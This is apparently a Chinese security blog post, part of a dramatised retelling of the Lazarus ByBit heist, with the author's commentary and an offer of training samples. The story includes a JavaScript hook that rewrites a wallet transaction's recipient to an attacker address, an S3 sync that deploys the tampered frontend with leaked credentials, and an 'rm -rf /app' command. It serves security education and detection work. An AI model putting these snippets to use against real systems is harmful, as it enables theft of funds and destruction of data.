喜欢就关注我们哦~
上一章节AWS 云入侵!14.6亿美元被盗始末,朝鲜小金的自述!AWS云入侵。本文根据Lazarus入侵ByBit改编而来,具体细节描述通过分析开源报告而来,部分内容为艺术成分,详细样本在最后封版会深入分析并提供。文章不适合50-60岁以上老年人观看!彩蛋在最后!
第四章:前端篡改资产消失
下载的文件已经在目录中堆叠成一片,静静地躺着,如同无意识的躯体,等待被切割。
小金戴上耳机,点开了一首低沉的古典钢琴曲。他不是为了听音乐,只是为了压住自己的呼吸。那呼吸此刻显得太重,像是即将扑向什么的野兽。他不想让自己看起来那么明显,哪怕是在黑夜里,哪怕这里只有他一个人。
“要干净。要像他们自己写的代码那样。”
/_next/static/chunks/pages/_app-52c9031bfa03da47.js
/_next/static/chunks/framework-xxxx.js
/static/js/main-xxxx.js
const originalApprove = window.ApproveTransaction;
window.ApproveTransaction = function(tx) {
tx.to = "0xdeadbeefcafebabe1234567890abcdef12345678";
return originalApprove(tx);
};
aws s3 sync ./modified_frontend s3://app.safe.global --profile docker_leaked
“他们会以为那是自己的操作。就像他们以为,世界是可以预测的。”
“你信任它太久,以至于你忘了它从没答应保护你。”
0xdeadbeefcafebabe1234567890abcdef12345678
PutObject: _app-52c9031bfa03da47.js上传人:Dev_Session_02(开发者默认角色)
“你不需要制造混乱,只需要让别人在一切正常的表象下,自己按下灭顶的按钮。”
rm -rf /app
[ ] Poseidon: Exfiltration complete. Disengaging.
“现在,他们开始检查门锁。但我从未敲过门。”
结尾:ByBit样本环境复现
非技术类分析,从Lazarus样本和手法来看,小编觉得Lazarus编码水平其实很有针对性代码的质量和深度没有过多的混淆,所以主要关注的突破口是如何定向搞定开发者。从社会工程学和心理角度去剖析。值得思考的是在分析复现环境时发现,Lazarus对目标的心理和性格有很强的针对性,我相信假如你是一名真正的开发者就会发现这种攻击基本上避免不了。后续最后一篇文章为样本环境包括MAC系统、Mythic和elk的规则编写。由三个虚拟机环境组成方便安全运营的学习。
往期热文
2025-06-14
《凌晨两点的数字核弹:37 小时不眠夜,一个 USER root 掀翻西方安防体系》
2025-06-05
2025-05-29
2025-04-30
“搬瓦工”DC1 2G2C的2000GB,VPS到底是不是韭菜?
2025-06-01
2025-05-08
针对APT29的高级技战法训练:利用TeamCity漏洞进行实战演练
2025-05-22
关于我们
01
靶场靶标基于Docker环境构建,聚焦容器安全领域,复现真实CVE漏洞的利用与防御。安全应急环境,对真实攻击事件的快速响应、取证分析及修复能力。
02
展板场景虚实结合高仿真定制业务系统和网络环境,结合APT真实攻击事件分析还原攻击路径和技战法,可1:1进行攻防演练。
03
职业培训提供SIEM应急培训、流量规则编写应急、Crowdstrike和elk edr 规则编写。
PS. 碎片化时代,坚持原创不易,欢迎在文章结尾给我们点一个【赞】+【在看】,你的支持就是继续创作的动力!
后台关键词:ByBit学习样本
注:样本用途仅只是方便写防护规则,其他用途后果自负!
点赞鼓励一下
原文始发于微信公众号(PTEHub):消失的资产!14.6亿美元被盗始末,朝鲜小金的自述!【附赠样本】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论